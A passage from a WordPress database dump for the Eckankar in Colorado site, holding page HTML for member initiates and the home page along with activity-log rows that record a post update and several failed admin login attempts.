0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231538,39180,'_message_key','post_updated'),(231539,39180,'_user_id','2'),(231540,39180,'_user_login','S8zhaBda'),(231541,39180,'_user_email','nada@zipnadanot.org'),(231542,39180,'_server_remote_addr','76.130.120.x'),(231543,39180,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=68102&action=edit'),(231544,39181,'failed_username','admin'),(231545,39181,'server_http_user_agent','Mozilla/5.0'),(231546,39181,'_message_key','user_unknown_login_failed'),(231547,39181,'_server_remote_addr','20.14.80.x'),(231548,39182,'failed_username','admin'),(231549,39182,'server_http_user_agent','Mozilla/5.0'),(231550,39182,'_message_key','user_unknown_login_failed'),(231551,39182,'_server_remote_addr','20.14.80.x'),(231552,39183,'failed_username','admin'),(231553,39183,'server_http_user_agent','Mozilla/5.0'),(231554,39183,'_message_key','user_unknown_login_failed'),(231555,39183,'_server_remote_addr','20.14.80.x'),(231556,39184,'failed_username','administrator'),(231557,39184,'server_http_user_agent','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(231558,39184,'_message_key','user_unknown_login_failed'),(231559,39184,'_server_remote_addr','45.61.187.x'),(231560,39185,'post_id','7160'),(231561,39185,'post_type','page'),(231562,39185,'post_title','Home'),(231563,39185,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 30px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Raleway\'; font-weight: 500; font-size: 30px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" 